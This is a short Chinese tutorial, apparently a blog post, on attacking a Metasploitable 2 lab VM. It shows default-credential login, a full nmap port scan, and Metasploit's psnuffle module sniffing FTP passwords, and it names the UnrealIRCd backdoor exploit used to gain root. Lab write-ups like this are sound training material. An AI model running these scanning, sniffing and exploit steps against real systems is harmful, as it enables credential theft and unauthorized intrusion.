本文介绍了如何使用Metasploitable 2进行网络安全测试。首先,通过默认用户名和密码msfadmin登录,并用nmap扫描靶机IP 192.168.68.139的所有端口。接着,利用Metasploit的psnuffle模块进行21端口密码嗅探。最后,展示了通过exploit/unix/irc/unreal_ircd_3281_backdoor模块攻击6667端口,成功获取服务器root权限。
Metasploitable默认的用户名是 :msfadmin 密码是: msfadmin
登陆之后使用ip addr 查看ip地址,本例中的IP地址是:192.168.68.139,可能与您的实际环境不同。
在parrot里面使用nmap扫描靶机全部的端口。
sudo nmap -p0-65535 192.168.68.139
21端口密码嗅探案例
本次使用的模块:auxiliary/sniffer/psnuffle
首先配置好Metasploit,Metasploit要以管理员身份启动。
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > exploit
[*] Auxiliary module running as background job 1.
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
使用xshell登陆ftp服务器
[e:\~]$ ftp msfadmin@192.168.68.139
Connecting to 192.168.68.139:21...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
220 (vsFTPd 2.3.4)
msfadmin
331 Please specify the password.
230 Login successful.
ftp:/home/msfadmin>
嗅探成功
通过6667端口攻击靶机的示例
首先启动我们的大杀器Metasploit
本次攻击使用的模块为exploit/unix/irc/unreal_ircd_3281_backdoor
几行命令过去。拿到服务器root权限,是不是特别爽
扫一扫
3090
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
